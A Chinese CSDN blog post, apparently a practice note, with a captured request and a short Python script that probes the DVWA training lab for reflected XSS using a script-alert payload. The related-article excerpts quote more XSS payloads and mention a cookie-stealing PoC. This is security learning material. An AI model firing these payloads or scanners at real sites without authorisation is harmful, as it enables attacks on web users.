python DVWAXSSPOC练习

最新推荐文章于 2023-10-21 09:40:23 发布
最新推荐文章于 2023-10-21 09:40:23 发布
阅读量285 收藏
点赞数 1
文章标签: python 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/132796219
版权

XSS反射性低难度

数据包

GET /dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E HTTP/1.1

Host: 10.9.75.161

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close

构建url

target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'

构建header

  headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
             "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }

终极POC

import requests
def XSS(url):
    target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'
    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
             "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    }
    try:
        res=requests.get(url=target,headers=headers)
        print(res.text)
        if "xss" in res.text:
            print('[+]',url,'存在XSS漏洞')
        else:
            print('[-]',url,'不存在XSS漏洞')
    except Exception as e:
        print('Error')
        print(e)
if __name__ == '__main__':
    url=input('请输入目标IP地址:')
    XSS('http://'+url)

运行结果

blackK_YC
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 280
仅仅是自已用,无别的想法(doge)
xss poc
cnbird's blog
03-15 764
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
XSS POC
qq_43616736的博客
07-28 1930
xss xss 作为owasp top 10 之一, xss 被称为跨站脚本攻击 xss 危害: 1.盗取各种用户帐号 2.窃取用户cookie资料,冒充用户身份进入网站 3.劫持用户会话,执行任意操作 4.刷流量,执行弹窗广告 5.传播蠕虫病毒 xss漏洞发生在 ...
python写注入漏洞的poc
weixin_30552811的博客
04-30 404
webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line...
python3基础学习(http host头攻击漏洞POC)
weixin_33682719的博客
11-12 484
  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下: from urllib import request import sys import re url=sys.argv[1] header={'Host' : 'www.eth10.com'} req=request.Request(u...
python for循环练习
09-01
python for循环练习
python练习
12-20
输入某二叉树的前序遍历和中序遍历的结果,请重建出该二叉树。假设输入的前序遍历和中序遍历的结果中都不含重复的数字。例如输入前序遍历序列{1,2,4,7,3,5,6,8}和中序遍历序列{4,7,2,1,5,3,8,6},则重建二叉树并返回...
python算法练习
04-03
python算法练习
python逻辑练习
03-18
python逻辑练习
pythonlearn练习文件
03-24
python练习文件
uxss-poc:具有多个目标站点的通用 xss PoC (CVE-2015-0072)
06-23
通用跨站脚本PoC 这是 CVE-2015-0072 的 PoC,用于顺序获取目标网站 cookie。 免责声明 此概念证明仅用于教育目的。 未经事先许可,请勿将其用于任何系统。 您应对自己使用此代码执行的操作负责。 改进 为了使漏洞利用工作,第一帧位置内的javascript注入必须发生在第二帧重定向之后。 在另一个 PoC 中提出的第一个解决方案部署了睡眠和超时​​。 但是,如果服务器同步重定向和睡眠请求,则可以在不睡眠的情况下利用该漏洞。 其实有一点setTimeout,但是500 ms比之前的5000有了很大的进步! 注意:此代码是一个 PoC,它从未在我的测试环境之外进行过测试。 用法 npm install node app.js 用于基本日志记录启动 node app.js > cookies.txt 配置 在conf.json ,将host设置为公共主机的值,并将t
Moodle-CVE-2019-3810:Moodle(<3.6.2,<3.5.4,<3.4.7,<3.1.16)XSS PoC,用于特权升级(学生为管理员)
05-13
面条CVE-2019-3810 Moodle(<3.6.2,<3.5.4,<3.4.7,<3.1.16)用于特权升级的XSS PoC(学生为管理员)。 这是我在过去的一次高校考试中发现的过去的错误之一。 当时,它已经足够成功,几乎仅使用一个简单的bug即可窃取管理员访问权限并获得对Moodle的完全控制。 从可以看出,该错误自Moodle(2003)的旧版本以来一直存在,并。 时间线: 2018年12月-向Moodle报告了该错误 2019年1月-补丁发布 2021年4月-PoC披露 警告 仅用于教育目的。 请勿将EXPLOIT用于非法活动。 作者不对任何滥用或损坏负责。 PoC 将上载到pastebin或其他类似服务。 将userid的值更改为您自己的id。 假设网址为https://pastebin.com/raw/xxxxxxxx 。 登录到您的学生帐户。 用" sty
HTML5 JQuery POC
11-23
HTML5 JQuery POC HTML5 JQuery POC
jQuery XSS POC汇总
afei001
06-08 1213
1.jQuery-2432_xssPOC <!DOCTYPE html> <html lang="zh"> <head>jQuery-2432_xssPOC</head> <body> <script type="text/javascript" src="http://target/jquery.js"></script> <script type="text/javascript"> $.get...
XSS漏洞的poc与exp
bamanju0574的博客
09-01 886
poc <script>alert('xss')</script> 最简单常用的poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
python编写简单poc,验证dvwa靶场
记录日常学习
09-02 391
python编写简单poc练习,熟悉poc基本构造,以dvwa为例。
反射型xss漏洞总结和python脚本复现
Azehng的博客
10-21 397
content访问该页面,并以GET方式给content参数赋值,页面响应如下当我们输入,页面响应如下上面就是xss漏洞的体现场景,也算一种注入漏洞。跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
常用xss绕过学习及poc,2
qq_38122566的博客
01-06 918
常见标签 <scirpt>标签 <scirpt>alert("xss");</script> <img>标签 <img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img sc...
XSS漏洞总结之小试牛刀
热门推荐
MX的博客
06-20 1万+
一:XSS漏洞总结 1&amp;amp;amp;gt;:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2&amp;amp;amp;gt;: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
python九寨沟练习
最新发布
04-04
当然,我可以为您提供一些关于Python九寨沟练习题的介绍。九寨沟练习题是一系列用于练习和巩固Python编程知识的题目集合,它们涵盖了Python的各个方面,包括基础语法、数据类型、函数、条件语句、循环、列表、字典、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值